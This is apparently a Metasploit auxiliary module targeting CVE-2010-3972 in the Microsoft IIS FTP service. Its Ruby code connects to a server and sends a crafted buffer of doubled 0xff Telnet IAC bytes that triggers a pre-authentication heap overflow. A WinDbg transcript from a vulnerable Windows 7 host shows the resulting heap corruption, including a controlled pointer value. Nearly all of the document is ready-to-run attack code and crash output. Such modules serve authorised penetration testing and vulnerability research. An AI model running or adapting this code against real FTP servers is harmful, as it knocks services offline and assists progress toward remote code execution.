##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

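class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers the module metadata (name, description, authors, references,
  # disclosure date) and the one option the module uses: the target FTP
  # port, RPORT, defaulting to 21.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS FTP Server Encoded Response Overflow Trigger',
      'Description'    => %q{
          This module triggers a heap overflow when processing a specially crafted
        FTP request containing Telnet IAC (0xff) bytes. When constructing the response,
        the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.

        This issue can be triggered pre-auth and may in fact be exploitable for
        remote code execution.
      },
      'Author'         =>
        [
          'Matthew Bergin',  # Original discovery/disclosure
          'jduck'            # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-3972' ],
          [ 'OSVDB', '70167' ],
          [ 'BID', '45542' ],
          [ 'MSB', 'MS11-004' ],
          [ 'EDB', '15803' ],
          [ 'URL', 'https://msrc-blog.microsoft.com/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability/' ]
        ],
      'DisclosureDate' => '2010-12-21'))

    register_options(
      [
        Opt::RPORT(21)
      ])
  end

  # Connects to the target FTP service, prints the banner it sends, submits
  # the single request that triggers the overflow and disconnects.
  #
  # A connection error raised while talking to the service is reported with
  # print_error instead of being swallowed silently, so a refused, unreachable
  # or timed-out target is visible to the operator and cannot be mistaken for
  # a successful trigger.
  #
  # @return [void]
  def run
    connect

    # Read whatever the service sends first (up to 10 seconds). A missing
    # banner is tolerated: to_s turns nil into "" and the run continues.
    banner = sock.get_once(-1, 10)
    print_status("banner: #{banner.to_s.strip}")

    buf = Rex::Text.pattern_create(1024)

    # the 0xff's must be doubled, the server will un-and-re-double them.
    ffs = "\xff" * (0x7e*2)

    # Continuing after the first exception sometimes leads to this being dereferenced.
    buf[0,3] = [0xdeadbe00].pack('V')[1,3]

    buf[4,ffs.length] = ffs
    buf << "\r\n"

    sock.put(buf)

    disconnect
  rescue ::Rex::ConnectionError => e
    # Previously an empty rescue: the failure was hidden and the module
    # returned as if the request had been delivered.
    print_error("Connection failed: #{e.message}")
  end
end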

=begin

This transcript is from a vulnerable Win7 machine:

Processing initial command '$<script.wdbg'
0:012> $<script.wdbg
0:012> bp ftpsvc+3f360 ".printf \"buf @ 0x%x, len: 0x%x (end: 0x%x)\\n\", eax, ecx, (eax+ecx);g"
0:012> bp ftpsvc+3f382 ".printf \"extra len: 0x%x\\n\", edi;g"
0:012> bp ftpsvc+3f395 ".printf \"(0x%x+0x%x) 0x%x > (0x%x-0x%x) 0x%x ??\\n\", ecx, edi, ebx, poi(esi+14), poi(esi+8), edx;g"
0:012> bp ftpsvc+3f397
0:012> bp ftpsvc+3f39f "r @$t0 = ecx;g"
0:012> bp ftpsvc+3f3a4 ".printf \"allocated 0x%x bytes at 0x%x (end: 0x%x)\\n\", @$t0, eax, (eax+@$t0);g"
0:012> *bp ftpsvc+3f3c0 ".printf \"writing 0xff to 0x%x\\n\", eax;g"
0:012> *bp ftpsvc+3f3c6 ".printf \"writing 0x%x to 0x%x\\n\", (edx & 0xff), eax;g"
0:012> g
buf @ 0x97f81c, len: 0x1b (end: 0x97f837)
extra len: 0x0
buf @ 0x3e4ca0, len: 0x3a4 (end: 0x3e5044)
extra len: 0x7e
(0x3a4+0x7e) 0x422 > (0x422-0x0) 0x422 ??
Breakpoint 3 hit
eax=003e4ca0 ebx=00000422 ecx=000003a4 edx=00000422 esi=00dcfaf8 edi=0000007e
eip=6c63f397 esp=00dcfaac ebp=00dcfac0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ftpsvc!TELNET_STREAM_CONTEXT::OnSendData+0x49:
6c63f397 8b7df8          mov     edi,dword ptr [ebp-8] ss:0023:00dcfab8=00000000
0:007> g
(2f8.a40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=003e50d0 ebx=00000000 ecx=ffffffff edx=003e4898 esi=003e4890 edi=002f0000
eip=778f30d7 esp=00dcf990 ebp=00dcfa70 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
ntdll!RtlpFreeHeap+0x4d6:
778f30d7 8b19            mov     ebx,dword ptr [ecx]  ds:0023:ffffffff=????????
0:007> g
(2f8.a40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=003e4898 ebx=003e4c98 ecx=deadbe27 edx=ffffff41 esi=003e4890 edi=002f0000
eip=778f6030 esp=00dcf950 ebp=00dcf978 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlpCoalesceFreeBlocks+0x268:
778f6030 8b4904          mov     ecx,dword ptr [ecx+4] ds:0023:deadbe2b=????????

=end